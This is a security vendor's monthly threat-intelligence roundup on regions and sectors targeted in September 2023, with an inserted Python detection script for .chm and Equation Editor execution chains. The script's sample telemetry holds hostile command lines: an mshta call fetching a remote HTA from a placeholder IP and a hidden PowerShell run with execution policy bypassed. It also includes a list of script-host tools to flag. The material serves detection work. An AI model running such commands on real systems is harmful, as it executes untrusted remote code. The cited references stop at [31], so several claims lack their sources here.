September 2023: Regions and Industries at Risk


Welcome to Picus Security's monthly cyber threat intelligence roundup! 

Each month, we aim to provide a comprehensive yet digestible analysis of the evolving threat landscape, including which sectors, industries and regions cybercriminals targeted most in the wild and which are most at risk.

Our research is conducted throughout the entire month, utilizing a diverse range of resources that span across threat intelligence and malware dump platforms, blogs, exploit databases, sandboxes, and network data query results. We draw upon this wealth of information to provide you with a holistic understanding of the cyber threat environment, with a particular focus on dissecting malware campaigns, attack campaigns conducted by threat actors and advanced persistent threat (APT) groups, and new malware samples observed in the wild.

By following our monthly threat report, you'll be able to ascertain which threat actors or malware could potentially impact your sector, gauge if your country is being specifically targeted, and understand if there is a surge in threat activity correlated with geopolitical events or state-backed actions. 


Top Four Most Targeted Regions in September

September 2023 has marked a significant surge in cyberattacks across the globe, underscoring the critical need for robust cybersecurity measures. 

 

Most Targeted Region, Threat Actors, Malware and Tools

1. Northern America
Threat actors: Scattered Spider (a.k.a. Muddled Libra, Scatter Swine) [1], Chinese Smishing Triad gang [2], NoName057(16) hacktivist group (a.k.a. NoName, NoNameHacktivistGroup) [3], GREF (a.k.a. APT15, Ke3chang, Mirage, Vixen Panda, Playful Dragon) [4], Play ransomware gang [5], Anonymous Sudan hacktivist group [6], LockBit ransomware gang [7], Lucifer threat actor [8], Earth Estries APT ([9], [10]), Cactus ransomware group [11], Storm-0558 (China-based) [13], Razor 1911 cracking group [14], Dark Angels ransomware group (Dunghill Leak site; Babuk-derived) [15], Medusa ransomware group [16], North Korean threat actors (a.k.a. TraderTraitor, Jade Sleet) [17], Lazarus APT group [18], NSO Group [19], ALPHV (BlackCat) ransomware group [20], Storm-0324 [21], Snatch ransomware gang [22], Akira ransomware-as-a-service group [23], Scattered Spider deploying BlackCat ransomware [24], NoEscape ransomware-as-a-service [25]
Malware and tools: 0ktapus phishing kit [26], DDoSia bot [3], BadBazaar [4], Play ransomware [5], LockBit ransomware [7], Chae$ 4 [8], Cactus ransomware [11], unpatched Zavio IP camera vulnerabilities (disclosed by BugProve) [12], PrintSpoofer and KingHamlet [27], M3_Mini_Rat, PhoenixMiner and lolMiner [28], JSSLoader, Gozi infostealer, Nymaim downloader/locker, GandCrab ransomware, IcedID infostealer, Gootkit and Dridex banking trojans, Sage ransomware [21]

2. East Asia
Threat actors: Earth Estries APT [9], P2PInfect worm operators [29], state-sponsored group, possibly linked to Russia, behind the Pipedream (a.k.a. Incontroller) ICS malware [30], TAG-74 [31], Five Families hacktivist group [32], Indian Cyber Force (ICF) hacker group [33], Andariel [34], GREF [4], Flax Typhoon APT (a.k.a. ETHEREAL PANDA) [35], Kimsuky APT (a.k.a. APT43, Emerald Sleet, Nickel Kimball, Velvet Chollima) [36]
Malware and tools: Zingdoor, TrillClient, HemiGate [9], P2PInfect worm [29], BadOmen (Pipedream module targeting Omron PLCs) [30], ReVBShell backdoor and Bisonal [31], the 'Second Date' cyber espionage tool [37], Sainbox RAT, Purple Fox, ValleyRAT [38], Gh0st RAT, DTrack, YamaBot, NukeSped, Rifdoor, Phandoor, Andarat, Andaratm, TigerRAT, MagicRAT, EarlyRAT, QuiteRAT, Black RAT, Goat RAT, AndarLoader, DurianBeacon [34]

3. Europe
Threat actors: Earth Estries APT ([9], [10]), GREF (a.k.a. APT15, Ke3chang, Mirage, Vixen Panda, Playful Dragon) [4], Lucifer threat actor [8], W3LL threat actor [39], Cactus ransomware group [11], Scattered Spider deploying BlackCat ransomware [24]
Malware and tools: Zingdoor, TrillClient, HemiGate [9], BadBazaar [4], Chae$ 4 [8], Cactus ransomware [11], unpatched Zavio IP camera vulnerabilities (disclosed by BugProve) [12], M3_Mini_Rat, PhoenixMiner and lolMiner [28], BlackCat ransomware [24], Pegasus spyware [40], RedLine commodity malware [41], Classiscam scam-as-a-service program [42]

4. Southeast Asia
Threat actors: Earth Estries APT [9], P2PInfect worm operators [29], Earth Lusca APT [43], Peach Sandstorm (a.k.a. HOLMIUM) [43], Garnesia Team (a.k.a. Mr.Heckers Ft. /RizkullSec) [44]
Malware and tools: Zingdoor, TrillClient, HemiGate [9], M3_Mini_Rat, PhoenixMiner and lolMiner [28], P2PInfect worm [29], SprySOCKS [45], MMRat Android banking trojan [47]

Table 1. Most Targeted Regions in September 2023.

Below, you will find more contextual information regarding the regions targeted by threat actors and malware campaigns.

September Cyber Sweep: Northern America (U.S.) in the 'Byte' of the Storm!

In September, the United States faced a diverse range of cyber threats from various sophisticated actors, each employing distinct techniques and targeting different sectors and platforms. 

The Lazarus APT group [18] targeted the technology sector by exploiting vulnerable Microsoft IIS servers and third-party software, then using DLL side-loading to run its malware under the cover of a legitimate, signed process, consistent with the group's cyber espionage objectives.

Apple patched zero-click iOS bugs that NSO Group [19] had exploited to deliver its Pegasus spyware to individual targets, including government officials, a reminder that a fully updated consumer device is not a safe assumption. The financially motivated Storm-0324 group [21] abused Microsoft Teams chats to deliver phishing lures, a channel many organizations filter less strictly than email, and has distributed JSSLoader, the Gozi infostealer and GandCrab ransomware, among other payloads, against technology companies.

The NoEscape ransomware-as-a-service operation [25] claimed an attack on the International Joint Commission, a U.S.-Canada water body, illustrating how a breach of a shared body can expose confidential data from every participating agency. GREF [4], also tracked as APT15, extended its espionage reach by publishing trojanized Signal and Telegram apps on official app stores; the bundled BadBazaar malware stole user data from victims in locations including China, Ukraine and the United States.

Across these cases, knowing each actor's objectives, targeted industries and regions, and specific tooling is what lets defenders prioritize controls and detections rather than react to each headline in isolation.

Silver Surfer: East Asia Rides the Second Wave in Cyber Attack Rankings!

In September, the cyber threat landscape in East Asia experienced a notable influx of advanced attacks. The P2PInfect malware, a known peer-to-peer worm [29], manifested a significant surge in its activities, observing a 600-fold increase, primarily targeting systems in China, Singapore, Hong Kong, and Japan. This malware has been evolving, revealing a relentless enhancement in its malicious capabilities and a broadening spectrum of its reach and impact in the region.

Omron, a Japanese industrial automation vendor, patched vulnerabilities in its PLCs and engineering software that were discovered during analysis of ICS malware: the BadOmen component of the Pipedream (a.k.a. Incontroller) toolkit, attributed to a state-sponsored group with probable links to Russia, is built to interact with Omron controllers [30].

The Chinese state-backed group TAG-74 [31] has been persistently targeting South Korean government, political and academic bodies, using malicious .chm (Windows HTML Help) files to start the execution chain that deploys the ReVBShell backdoor and Bisonal malware. The hacktivist group Five Families [32] attacked the Taiwanese computer parts manufacturer Biostar and obtained sensitive customer and employee data, with potentially significant consequences for the company and its stakeholders.

The Indian Cyber Force hacker group [33] has been notably active, publishing a timeline of planned attacks on several countries including Pakistan and China, raising concerns about critical infrastructure. Meanwhile, the Chinese APT group GREF [4] (also known as APT15, Ke3chang, Mirage and Playful Dragon) abused legitimate distribution channels by planting fake Signal and Telegram apps in official app stores, deploying the BadBazaar malware to exfiltrate data from victims in locations including the United States, Germany and Spain.

Andariel [34], a sub-cluster of the Lazarus APT, continues to deploy an arsenal including Gh0st RAT, DTrack and YamaBot against South Korean finance, government and technology organizations, while Flax Typhoon (a.k.a. ETHEREAL PANDA) [35] relies on legitimate software and commodity tools such as China Chopper and Metasploit to keep long-term access to Taiwanese organizations, with espionage and sustained access as the objective in both cases.

Together, these activities show a resilient threat landscape combining state-backed espionage, cybercrime and hacktivism, and call for elevated defensive postures across the affected and potentially targeted countries.

Digital Battlefield: Europe Holds the Bronze Place in September’s Cyber Siege!

Europe is on heightened alert following a spike in cyber threats from both internal and external actors. Earth Estries (a.k.a. FamousSparrow) [9] is conducting advanced cyber espionage against government and technology organizations in the U.S., Germany and Southeast Asia, using the Zingdoor, TrillClient and HemiGate malware [9]. The same research briefing [10] also covered two separate campaigns: exploitation of CVE-2023-32315 in Openfire to deploy the Kinsing cryptojacking malware, and the BadBazaar Android spyware distributed through trojanized Telegram and Signal builds.

W3LL threat actors ([39], [46]) are compromising Microsoft 365 accounts with the W3LL Panel phishing kit, which proxies the victim's login session to capture credentials and session cookies and so bypasses multi-factor authentication, while the Cactus ransomware group [11] exploits known vulnerabilities to get into corporate networks and disrupt operations. Dozens of unpatched flaws in IP cameras from the defunct vendor Zavio, disclosed by BugProve [12], are a reminder that end-of-life devices will never receive a fix and have to be isolated or replaced rather than patched.

Unidentified actors running cryptocurrency miners on graphic designers' high-powered GPUs [28] and the GREF threat group (a.k.a. APT15, Ke3chang, Mirage, Vixen Panda, Playful Dragon) [4] planting malicious apps illustrate the breadth of threats, while Scattered Spider's attacks deploying BlackCat ransomware [24] show how far social engineering combined with a ransomware affiliate partnership can go.

Lastly, the Ukraine-Russia conflict reflects the impact of geopolitical tensions on cyber activities, with the Redline commodity malware [41]  illustrating the broader implications of such disputes on global cybersecurity. 

In essence, the multifaceted nature of these cyber threats requires a comprehensive and collaborative approach to cybersecurity, emphasizing continual vigilance and innovation to protect against the evolving threat landscape.

Caught in the Net: Southeast Asia Navigates Through the Cyber Storm as the Fourth Most Targeted Region!

In September, Southeast Asia saw a wave of sophisticated attacks, led by the Earth Estries APT [9], which conducted cyber espionage against government and technology organizations in several countries in the region, including the Philippines and Malaysia, using Zingdoor, TrillClient and HemiGate to infiltrate systems and exfiltrate large amounts of data. The Kinsing campaign exploiting CVE-2023-32315 in Openfire and the BadBazaar Android spyware, reported in the same briefing [10], are separate operations and not Earth Estries tooling.

Unidentified actors ran crypto-mining campaigns that weaponized the legitimate Advanced Installer tool, hitting organizations in Singapore and Vietnam with M3_Mini_Rat and PhoenixMiner [28]. The P2PInfect peer-to-peer worm [29] also surged, leaving infected systems mainly in China, Singapore, Hong Kong and Japan. The region was further affected by the MMRat Android banking trojan [47], distributed through phishing websites; once installed, it abuses Accessibility permissions to remotely control the device and carry out bank fraud, mainly against users in Indonesia, Vietnam, Singapore and the Philippines [47].

Earth Lusca and the Iranian espionage group Peach Sandstorm [43] also focused on government targets in Southeast Asia, Central Asia and the Balkans, and the hacktivist group Garnesia Team [44] launched a DDoS attack on Indonesia's Ministry of Public Works and Housing, demonstrating its ability to disrupt government operations.

The diverse spectrum of these cyber threats underscores the pivotal need for enhanced cyber defense mechanisms and elevated security postures across Southeast Asia to counter the multifaceted, dynamic threats it continually faces.

Top 5 Most Targeted Sectors in September

In September 2023, the Government and Administrations, Technology, Healthcare, Telecommunications and Education sectors emerged as the top five most targeted domains for cyber-attacks.

More detailed information on each sector follows the table.

 

Targeted Sector, Threat Actors, Malware

1. Governments and Administrations
Threat actors: Earth Estries APT ([9], [10]), NoName057(16) hacktivist group (a.k.a. NoName, NoNameHacktivistGroup) [3], LockBit ransomware gang [7], Lucifer threat actor [8], NSO Group [19], Scattered Spider deploying BlackCat ransomware [24], NoEscape ransomware-as-a-service [25], TAG-74 [31], Earth Lusca APT [43], Peach Sandstorm (a.k.a. HOLMIUM) [43], Andariel [34], Flax Typhoon APT (a.k.a. ETHEREAL PANDA) [35], BlackCat ransomware gang [49], Lazarus APT [34], OilRig (a.k.a. APT34, Cobalt Gypsy, Hazel Sandstorm, Helix Kitten) [50]
Malware: Zingdoor, TrillClient, HemiGate [9], DDoSia bot [3], LockBit ransomware [7], Chae$ 4 [8], BadBazaar and Kinsing [10], BlackCat ransomware [24], ReVBShell backdoor and Bisonal [31], Gh0st RAT, DTrack, YamaBot, NukeSped, Rifdoor, Phandoor, Andarat, Andaratm, TigerRAT, MagicRAT, EarlyRAT, QuiteRAT, Black RAT, Goat RAT, AndarLoader, DurianBeacon [34], Pegasus spyware [19], LokiBot [48], Solar and Mango malware [50]

2. Technology
Threat actors: Scattered Spider [1], Earth Estries APT ([9], [10]), Storm-0558 (China-based) [13], North Korean threat actors (a.k.a. TraderTraitor, Jade Sleet) [17], Lazarus APT [18], Storm-0324 (a.k.a. TA543, Sagrid) [21], APT29 (a.k.a. The Dukes, Cozy Bear) [51], Turla APT (a.k.a. Secret Blizzard) [52], Flax Typhoon [53]
Malware: Zingdoor, TrillClient, HemiGate [9], BadBazaar and Kinsing [10], JSSLoader, Gozi infostealer, Nymaim downloader/locker, GandCrab ransomware, IcedID infostealer, Gootkit and Dridex banking trojans, Sage ransomware [21], the 'Second Date' cyber espionage tool [37], LokiBot [48], China Chopper [53]

3. Healthcare
Threat actors: LockBit ransomware gang [7], W3LL threat actor [39], Snatch ransomware gang [22], Akira ransomware-as-a-service group [23], Cl0p ransomware gang [56], Ragnar Locker ransomware gang [57], unidentified actors behind the Carthage Area Hospital and Claxton-Hepburn Medical Center attacks [54] and the Just Kids Dental breach [55]
Malware: LockBit ransomware [7], BadBazaar and Kinsing [10], Cl0p ransomware [56], LokiBot [48]

4. Telecommunications
Threat actors: Doubl threat actor (a.k.a. Emo) [58], Sandman [59], Charming Kitten (a.k.a. APT42, Ballistic Bobcat, Mint Sandstorm, NewsBeef) [60], Iranian state-sponsored actor Peach Sandstorm (HOLMIUM) [61], ShroudedSnooper [62]
Malware: LuaDream [59], Sponsor [60], Python NodeStealer [61], HTTPSnoop and PipeSnoop [62]

5. Education
Threat actors: LockBit ransomware gang [7], Medusa ransomware group [16], Andariel (a.k.a. Nickel Hyatt, Silent Chollima) [34], Flax Typhoon (a.k.a. ETHEREAL PANDA) [53], Lazarus APT [34], Monti ransomware group [63], Ballistic Bobcat APT (a.k.a. APT35/APT42, Charming Kitten, TA453, PHOSPHORUS) [64]
Malware: LockBit ransomware [7], Gh0st RAT, DTrack, YamaBot, NukeSped, Rifdoor, Phandoor, Andarat, Andaratm, TigerRAT, MagicRAT, EarlyRAT, QuiteRAT, Black RAT, Goat RAT, AndarLoader, DurianBeacon [34], China Chopper [53], Sponsor [64], PowerLess, Plink, Merlin [65]

Table 2. Most Targeted Sectors in September 2023.

Byte the Bullet: Governments in the Crosshairs of Cyber Chaos!

In September, multiple governments were hit by a range of threat actors. The International Joint Commission, a U.S.-Canada water body, was targeted by the NoEscape ransomware-as-a-service operation [25], believed to be a rebrand of Avaddon.

South Korean academic, political and government bodies were targeted by a cyber-espionage campaign from TAG-74 [31], which used malicious .chm files to deploy the ReVBShell backdoor and Bisonal malware. Earth Lusca [43], assessed as China-aligned, targeted government departments across Southeast Asia, Central Asia and the Balkans with the SprySOCKS and Trochilus malware.

Peach Sandstorm, alias HOLMIUM [43], presumably Iranian, aimed its cyber-espionage campaigns at government departments, particularly focusing on those related to foreign affairs, technology, and telecommunications in Southeast Asia, Central Asia, and the Balkans, utilizing a range of advanced tactics and malware. 

Additionally, the Andariel APT [34] group (sub-group of Lazarus APT) targeted South Korean financial institutions, defense contractors, government agencies, and other sectors, employing a diverse array of malware, including Gh0st RAT, DTrack, and NukeSped, amongst others. Flax Typhoon APT [35], also known as ETHEREAL PANDA, concentrated its attacks on Taiwanese government organizations, utilizing legitimate software and tools like China Chopper and Metasploit for cyber espionage.

NSO Group [19] employed its potent Pegasus spyware to infiltrate smartphones of undisclosed government officials, extracting sensitive information. Finally, the NoName057(16) hacktivist group [3] executed attacks against unspecified government entities using undisclosed methodologies, driven by their hacktivist ideologies.

Data Dilemmas: Tech Titans Tangle with Second-Highest Security Breaches!

In September 2023, the Technology sector was heavily targeted by various cyber-attacks, underlining a critical need for reinforced cybersecurity. 

Microsoft and Facebook were among the companies affected. Earth Estries ([9], [10]), linked to FamousSparrow and SparklingGoblin, used the Zingdoor, TrillClient and HemiGate malware for espionage against technology companies, and relied on PowerShell downgrade attacks (forcing the legacy PowerShell 2.0 engine, which lacks script block logging) to evade detection while siphoning off data.

Microsoft reported that Storm-0558 [13] obtained a consumer account signing key from a crash dump after compromising an engineer's corporate account, then forged tokens to access email accounts at multiple organizations; the Turla APT [52], alias Secret Blizzard, was also observed probing Microsoft 365 Defender's defenses with multi-platform attacks.

Facebook was targeted by APT29 [51], also known as The Dukes or Cozy Bear, which deployed custom malware and new tactics to compromise the personal information of millions of users. The LokiBot infostealer [48] also persisted, exploiting CVE-2017-11882 in Microsoft Office's Equation Editor to steal credentials and other data from a variety of technology platforms.

Dose of Digital Danger: September’s Healthcare Hack Attack Spike!

The healthcare sector remains under significant threat from diverse actors employing a range of sophisticated malware and attack vectors. For example, LockBit ransomware gang [7] has threatened corporations like CDW, putting sensitive healthcare data at risk, with intentions driven by ransom demands. LokiBot, a prevalent information stealer, has leveraged vulnerabilities like CVE-2017-11882 in Microsoft Office, aiming for data theft across various sectors, including healthcare. 
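Two of the document-borne execution chains in this report leave a distinctive parent/child process trace: TAG-74's malicious .chm files are rendered by hh.exe (the Windows HTML Help viewer), which then spawns a script host, and LokiBot's CVE-2017-11882 exploit runs shellcode inside EQNEDT32.EXE (Equation Editor), a process that is launched by DCOM and never starts other programs on its own. The Python below is an added example, not code from the original report or from Picus; it runs a simple process-lineage rule over constructed Sysmon Event ID 1 style records. The sample events, the list of script hosts and the field names are assumptions for illustration.

```python
"""Flag document-borne execution chains in process-creation telemetry.

Added example, not from the original report. Records mimic the Image,
ParentImage and CommandLine fields of Sysmon Event ID 1 but are constructed.
"""
import ntpath
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Interpreters and LOLBins a malicious CHM typically launches from hh.exe.
# Assumed list; tune it to what your environment actually uses.
SCRIPT_HOSTS = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
}


@dataclass(frozen=True)
class Finding:
    rule: str
    parent: str
    child: str
    command_line: str


def _exe(path: str) -> str:
    """Lower-cased file name of a Windows path, e.g. 'hh.exe'."""
    return ntpath.basename(path).lower()


def evaluate(event: dict) -> Optional[Finding]:
    """Return a Finding if the parent/child pair matches a known bad chain."""
    parent = _exe(event["ParentImage"])
    child = _exe(event["Image"])
    cmdline = event.get("CommandLine", "")

    # Malicious .chm: hh.exe renders the help file, an embedded object or
    # shortcut then launches a script host. Legitimate help files do not.
    if parent == "hh.exe" and child in SCRIPT_HOSTS:
        return Finding("chm_execution_chain", parent, child, cmdline)

    # CVE-2017-11882: Equation Editor is started by DCOM (svchost.exe) to
    # render an OLE object; any child it spawns means shellcode is running.
    if parent == "eqnedt32.exe":
        return Finding("equation_editor_child_process", parent, child, cmdline)

    return None


def scan(events: Iterable[dict]) -> List[Finding]:
    """Evaluate every record and keep the hits, in input order."""
    return [f for f in map(evaluate, events) if f is not None]


# Constructed sample telemetry: two malicious chains among benign noise.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\hh.exe",
     "CommandLine": r'"C:\Windows\hh.exe" C:\Users\kim\Downloads\invitation.chm'},
    {"ParentImage": r"C:\Windows\hh.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c powershell -w hidden -ep bypass -f %TEMP%\rv.ps1"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "CommandLine": r'"EQNEDT32.EXE" -Embedding'},
    {"ParentImage": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta http://203.0.113.10/x.hta"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding.rule}] {finding.parent} -> {finding.child}: {finding.command_line}")
```

The second rule is deliberately broad: EQNEDT32.EXE has no business launching anything, so a child of any name is worth an alert, whereas the hh.exe rule is restricted to script hosts because some legitimate help files do open a browser. In a SIEM the same logic maps onto Sysmon Event ID 1 or Windows Security Event 4688 with command-line auditing enabled.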

Another instance includes Just Kids Dental [55], which was targeted by unknown threat actors, leading to the compromise of personal and health information of nearly 130,000 individuals. Similarly, undisclosed actors targeted Carthage Area Hospital and Claxton Hepburn Medical Center [54], creating disruptions though no breach of patient information was reported in this case. 

The Akira ransomware-as-a-service group [23], meanwhile, has actively been targeting healthcare organizations, employing a double-extortion method and exploiting weaknesses in VPNs. Moreover, the Canadian Nurses Association experienced a breach from the Snatch ransomware gang [22], exposing sensitive information and risking identity theft and other malicious activities. 

Each of these instances underscores a persistent and evolving threat landscape, with actors leveraging both known and unknown vulnerabilities and tactics to compromise sensitive healthcare data, necessitating continual advancements in cybersecurity measures within the healthcare sector to protect against a multitude of cyber threats.

September Static: Telecommunications Sector Dialed into the Fourth Most Hacked Hotspot!

In September, the telecommunications sector faced intense and sophisticated cyber threats from diverse actors wielding new malware and advanced attack methods.

Telecommunication service providers in the Middle East, for instance, have been besieged by ShroudedSnooper [62] using HTTPSnoop and PipeSnoop malware, allowing the remote execution of commands on infected devices and the monitoring of HTTP(S) traffic, significantly compromising the security infrastructure of the victim organizations. 

Unknown actors have exploited vulnerabilities in Atos Unify products, enabling potential full control over targeted systems through the execution of arbitrary PHP functions and operating system commands. Moreover, a persistent Iranian cyberespionage campaign named "Peach Sandstorm" [61] has been executing cyberattacks globally, utilizing Python NodeStealer malware to infiltrate and exfiltrate sensitive data from various sectors including telecommunications. 

Another threat actor, dubbed Sandman [59], targets telecommunication service providers across regions, deploying LuaDream malware to perform cyber espionage operations and gain long-term access to critical infrastructures. 

Charming Kitten [60], an Iran-linked cyberespionage group, has also left a significant imprint by infecting numerous organizations across sectors in Brazil, Israel, and the UAE with a newly identified backdoor. 

These relentless cyberattacks, exploiting both known and emerging vulnerabilities, underscore the urgent necessity for fortified cybersecurity defenses, vigilant monitoring, and international collaboration to protect and secure telecommunication infrastructures globally.

Classroom Chaos: Education Sector Schooled in Security, Ranking Fifth in September's Cyber Hit List!

In September, the education sector was prominently targeted by several threat actors deploying a variety of sophisticated malware. The Auckland University of Technology fell victim to the Monti ransomware group [63], which used Monti ransomware to infiltrate the university's IT environment, potentially disrupting operations and compromising data confidentiality and privacy. 

Additionally, educational institutions in South Korea were under siege from the Lazarus APT Group's Andariel [34] cluster. This threat actor unleashed a series of malware, including Gh0st RAT and DTrack, primarily focusing on cyber espionage and financial gain.

Within the United States, Crown Point Community Schools [66] and Minneapolis Public Schools experienced severe disruptions due to ransomware attacks. Crown Point faced an unidentified threat actor who initiated a ransomware attack via a phishing email, causing operational halt and a financial loss of $1 million. 

Minneapolis Public Schools were breached by the Medusa ransomware group [16], which used Medusa ransomware to compromise the personal information of more than 100,000 students, family members and staff. Additionally, CDW Corporation, which serves the education sector among others, was targeted by the LockBit ransomware gang [7], who deployed LockBit ransomware and threatened to release sensitive information, underscoring the sector's exposure to varied and escalating threats.

These breaches underscore the varied and rising threats that educational institutions face, from well-known groups employing an array of sophisticated malware, to unidentified actors exploiting common vulnerabilities. 

References

[1] "More Okta Customers Trapped in Scattered Spider's Web," The Register, Sep. 01, 2023. Available: https://go.theregister.com/feed/www.theregister.com/2023/09/01/okta_scattered_spider/

[2] D. Ahmed, “Chinese Smishing Triad Gang Hits US Users in Extensive Cybercrime Attack,” Hackread - Latest Cybersecurity News, Press Releases & Technology Today, Sep. 02, 2023. Available: https://www.hackread.com/chinese-smishing-triad-us-users-cybercrime-attack/. [Accessed: Sep. 29, 2023]

[3] “Undercover Researchers Decode Hidden Operations of NoName057(16),” The Cyber Express, Sep. 04, 2023. Available: https://thecyberexpress.com/undercover-researchers-noname05716/. [Accessed: Sep. 29, 2023]

[4] H. Rashid, “Chinese APT Slid Fake Signal and Telegram Apps onto Official App Stores,” Hackread - Latest Cybersecurity News, Press Releases & Technology Today, Sep. 04, 2023. Available: https://www.hackread.com/chinese-apt-fake-signal-telegram-app-stores/. [Accessed: Sep. 29, 2023]

[5] A. Khaitan, “Play Ransomware Group Strikes Luxury Hotel Chain, Claims Firmdale Hotels Data Breach,” The Cyber Express, Sep. 05, 2023. Available: https://thecyberexpress.com/firmdale-hotels-data-breach-play-ransomware/. [Accessed: Sep. 29, 2023]

[6] “ESPN Cyber Attack: Anonymous Sudan Targets ESPN Ahead of 2023 NFL Kickoff,” The Cyber Express, Sep. 05, 2023. Available: https://thecyberexpress.com/espn-cyber-attack-anonymous-sudan/. [Accessed: Sep. 29, 2023]

[7] A. Khaitan, “CDW Data Breach: LockBit Ransomware Threatens Corporation, Sets Deadline,” The Cyber Express, Sep. 05, 2023. Available: https://thecyberexpress.com/cdw-data-breach-lockbit-ransomware/. [Accessed: Sep. 29, 2023]

[8] “New Chae$ Variant Described.” Available: https://thecyberwire.com/newsletters/daily-briefing/12/169

[9] P. Nair and R. Ross, “‘Earth Estries’ APT Hackers Are Cyberespionage Pros.” Available: https://www.govinfosecurity.com/earth-estries-apt-hackers-are-cyberespionage-pros-a-22992. [Accessed: Sep. 29, 2023]

[10] “Fancy Bear and Camaro Dragon Sightings.” Available: https://thecyberwire.com/newsletters/research-briefing/5/26

[11] A. Khaitan, “Cactus Ransomware Group Hits 5 Global Corporations, Marfrig, Seymours Among Victims,” The Cyber Express, Sep. 06, 2023. Available: https://thecyberexpress.com/cactus-ransomware-group-major-corporations/. [Accessed: Oct. 01, 2023]

[12] E. Kovacs, “Dozens of Unpatched Flaws Expose Security Cameras Made by Defunct Company Zavio,” SecurityWeek, Sep. 06, 2023. Available: https://www.securityweek.com/dozens-of-unpatched-flaws-expose-security-cameras-made-by-defunct-company-zavio/. [Accessed: Oct. 01, 2023]

[13] S. Gatlan, “Hackers stole Microsoft signing key from Windows crash dump,” BleepingComputer, Sep. 06, 2023. Available: https://www.bleepingcomputer.com/news/microsoft/hackers-stole-microsoft-signing-key-from-windows-crash-dump/. [Accessed: Oct. 01, 2023]

[14] L. Abrams, “Rockstar Games reportedly sold games with Razor 1911 cracks on Steam,” BleepingComputer, Sep. 06, 2023. Available: https://www.bleepingcomputer.com/news/gaming/rockstar-games-reportedly-sold-games-with-razor-1911-cracks-on-steam/. [Accessed: Oct. 01, 2023]

[15] N. Goud, “Ransomware spreading gang reveals visa details of working employees in America,” Cybersecurity Insiders, Sep. 07, 2023. Available: https://www.cybersecurity-insiders.com/ransomware-spreading-gang-reveals-visa-details-of-working-employees-in-america/. [Accessed: Oct. 01, 2023]

[16] J. Warminsky, “Minneapolis school district says data breach affected more than 100,000 people.” Available: https://therecord.media/minneapolis-schools-say-data-breach-affected-100000. [Accessed: Oct. 01, 2023]

[17] "North Korean Hackers Exploit Zero-Day Bug to Target Cybersecurity Researchers," The Hacker News, Sep. 08, 2023. Available: https://thehackernews.com/2023/09/north-korean-hackers-exploit-zero-day.html. [Accessed: Oct. 01, 2023]

[18] “Protecting Your Microsoft IIS Servers Against Malware Attacks,” The Hacker News, Sep. 08, 2023. Available: https://thehackernews.com/2023/09/protecting-your-microsoft-iis-servers.html. [Accessed: Oct. 01, 2023]

[19] M. Bagwe and R. Ross, “Apple Fixes Zero-Click Bugs Exploited by NSO Group’s Spyware.” Available: https://www.govinfosecurity.com/apple-fixes-zero-click-bugs-exploited-by-nso-groups-spyware-a-23042. [Accessed: Oct. 01, 2023]

[20] V. Pandagle, “MGM Resorts Cybersecurity Breach: Was a 10-Minute Chat All It Took?,” The Cyber Express, Sep. 13, 2023. Available: https://thecyberexpress.com/mgm-resorts-cyber-attack-alphv-group/. [Accessed: Oct. 01, 2023]

[21] D. Ahmed, “Storm-0324 Exploits MS Teams Chats to Facilitate Ransomware Attacks,” Hackread - Latest Cybersecurity News, Press Releases & Technology Today, Sep. 13, 2023. Available: https://www.hackread.com/storm-0324-exploits-ms-teams-chats-ransomware/. [Accessed: Oct. 01, 2023]

[22] "Privacy Briefing 5/175," The CyberWire. Available: https://thecyberwire.com/newsletters/privacy-briefing/5/175

[23] M. K. McGee and R. Ross, “Feds Warn Healthcare Sector of Akira Ransomware Threats.” Available: https://www.govinfosecurity.com/feds-warn-healthcare-sector-akira-ransomware-threats-a-23073. [Accessed: Oct. 01, 2023]

[24] N. Goud, “Two Ransomware Attack Stories currently trending on Google,” Cybersecurity Insiders, Sep. 14, 2023. Available: https://www.cybersecurity-insiders.com/two-ransomware-attack-stories-currently-trending-on-google/. [Accessed: Oct. 01, 2023]

[25] J. L. Hardcastle, “US-Canada water org confirms ‘cybersecurity incident’ after ransomware crew threatens leak,” The Register, Sep. 15, 2023. Available: https://www.theregister.com/2023/09/15/ijc_noescape_ransomware/. [Accessed: Oct. 01, 2023]

[26] "Okta Warns of Social Engineering Attacks Targeting Super Administrator Privileges," The Hacker News, Sep. 02, 2023. Available: https://thehackernews.com/2023/09/okta-warns-of-social-engineering.html. [Accessed: Sep. 29, 2023]

[27] M. Bagwe and R. Ross, “Hackers Exploit Multiple Bugs in Hotel Booking Platform.” Available: https://www.govinfosecurity.com/hackers-exploit-multiple-bugs-in-hotel-booking-platform-a-23025. [Accessed: Oct. 01, 2023]

[28] B. Toulas, “Windows cryptomining attacks target graphic designer’s high-powered GPUs,” BleepingComputer, Sep. 07, 2023. Available: https://www.bleepingcomputer.com/news/security/windows-cryptomining-attacks-target-graphic-designers-high-powered-gpus/. [Accessed: Oct. 01, 2023]

[29] “Researchers Raise Red Flag on P2PInfect Malware with 600x Activity Surge,” The Hacker News, Sep. 21, 2023. Available: https://thehackernews.com/2023/09/researchers-raise-red-flag-on-p2pinfect.html. [Accessed: Oct. 01, 2023]

[30] E. Kovacs, “Omron Patches PLC, Engineering Software Flaws Discovered During ICS Malware Analysis,” SecurityWeek, Sep. 21, 2023. Available: https://www.securityweek.com/omron-patches-plc-engineering-software-flaws-discovered-during-ics-malware-analysis/. [Accessed: Oct. 01, 2023]

[31] T. S. Dutta, “Chinese Hackers use .chm Files to Hijack Execution Chain and Deploy Malware,” Cyber Security News, Sep. 21, 2023. Available: https://cybersecuritynews.com/chinese-hackers-chm-files/. [Accessed: Oct. 01, 2023]

